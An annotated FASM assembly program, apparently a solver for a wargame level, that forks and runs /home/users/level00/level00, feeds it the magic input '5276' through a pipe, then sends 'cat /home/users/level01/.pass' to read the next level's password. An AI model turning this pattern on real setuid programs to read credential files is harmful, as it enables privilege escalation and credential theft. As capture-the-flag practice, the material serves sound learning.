; FASM source for a 32-bit Linux ELF executable that talks to the kernel
; directly via int 0x80 (no libc). The number after `executable` is, per
; the FASM manual, the ELF OS ABI selector (3 = GNU/Linux) — TODO confirm
; for the assembler version in use.
format ELF executable $03
; Process entry point; _start is defined in the executable segment below.
entry _start
; Macro `NAME string <bytes...>`: emits the bytes at NAME and defines
; NAME.length as the number of bytes emitted, so callers can pass the
; address/length pair straight to write(2).
; `data*&`: the argument is mandatory (*) and greedy (&), i.e. the whole
; remainder of the line, commas included, is passed through to `db`.
struc string data*& {
.: db data
.length = ($ - .)
}
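; struct timespec as consumed by the i386 nanosleep syscall (nr 162 below):
; two 32-bit longs, tv_sec at +0 and tv_nsec at +4, 8 bytes in total.
; Fields are `rd` (doubleword), not `rq`: with quadword fields the kernel's
; tv_nsec slot (+4) would land on the upper half of tv_sec and the struct
; would be twice the ABI size; the zero-fill in _start masked that mismatch.
; Consumers must keep using timespec.sizeof / timespec.tv_sec symbolically
; rather than hard-coded offsets.
struc timespec {
.tv_sec: rd $01
.tv_nsec: rd $01
}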
; Instantiate the struct at address 0 inside a virtual block: no bytes are
; emitted, but timespec.tv_sec / timespec.tv_nsec become plain offsets and
; `$` at the end equals the struct size, recorded as timespec.sizeof for the
; stack reservation and zero-fill length in _start.
virtual at $00
timespec timespec
timespec.sizeof = $
end virtual
segment executable readable
;-----------------------------------------------------------------------
; _start   (i386 Linux, raw int 0x80: syscall nr in eax, args in ebx,ecx,edx)
;
; Flow: pipe() -> write _exploit_string into the pipe -> dup2(read end, 0)
;       so stdin is the pipe -> fork().
;   child  : execve(_target, {_target, NULL}, NULL), inheriting that stdin
;   parent : nanosleep(1 s), write _show_flag into the pipe, exit(0)
;
; Stack: after `sub esp,8`, [esp] = pipe read end, [esp+4] = pipe write end.
;        The parent later pushes a timespec below them, so the write end is
;        then reached as [esp+timespec.sizeof+4].
; Error handling: only pipe() is checked; write/dup2/nanosleep/execve
; results are ignored and the exit status is always 0. No wait4 is issued,
; so the parent may exit before the child finishes.
;-----------------------------------------------------------------------
_start:
and esp, not $0F                 ; 16-byte align the stack
sub esp, $08                     ; int fds[2]
mov eax, $2A                     ; sys_pipe (42)
mov ebx, esp                     ; fds
int $80
test eax, eax
jnz .exit                        ; pipe failed (eax = -errno): leave, still with status 0
mov eax, $04                     ; sys_write (4)
mov ebx, dword [esp+$04]         ; fd = write end
mov ecx, _exploit_string         ; buf
mov edx, _exploit_string.length  ; count
int $80                          ; return value not checked
mov eax, $3F                     ; sys_dup2 (63): stdin (0) now reads from the pipe
mov ebx, dword [esp]             ; oldfd = read end
xor ecx, ecx                     ; newfd = 0
int $80
mov eax, $02                     ; sys_fork (2)
int $80
test eax, eax
jz .child                        ; eax == 0 only in the child
; parent path (eax = child pid; a negative -errno on fork failure also ends up here)
sub esp, timespec.sizeof         ; struct timespec req on the stack
xor al, al                       ; stosb stores AL only; the pid in the upper bits is irrelevant
mov ecx, timespec.sizeof         ; byte count
mov edi, esp                     ; destination
rep stosb                        ; zero-fill; assumes DF=0, which Linux guarantees at process entry
mov byte [esp+timespec.tv_sec], $01 ; tv_sec = 1, tv_nsec stays 0
mov eax, $A2                     ; sys_nanosleep (162)
mov ebx, esp                     ; req
xor ecx, ecx                     ; rem = NULL
int $80
mov eax, $04                     ; sys_write (4)
mov ebx, dword [esp+timespec.sizeof+$04] ; fd = write end, above the timespec
mov ecx, _show_flag              ; buf
mov edx, _show_flag.length       ; count
int $80
jmp .exit
.child:
mov eax, $0B                     ; sys_execve (11)
mov ebx, _target                 ; filename
xor edx, edx                     ; envp = NULL
push edx ebx                     ; FASM pushes left to right: argv = {_target, NULL} at esp
mov ecx, esp                     ; argv
int $80                          ; returns only on failure, then falls through to exit(0)
.exit:
mov eax, $01                     ; sys_exit (1)
xor ebx, ebx                     ; status = 0
int $80
segment readable
; Payloads the parent writes into the pipe, in this order; the program
; exec'd in the child reads them from its stdin (see _start). Each symbol
; also gets a .length via the `string` macro for the write(2) calls.
_exploit_string string "5276", $0A
_show_flag string "cat /home/users/level01/.pass", $0A
; NUL-terminated path handed to execve as both filename and argv[0].
_target: db "/home/users/level00/level00", $00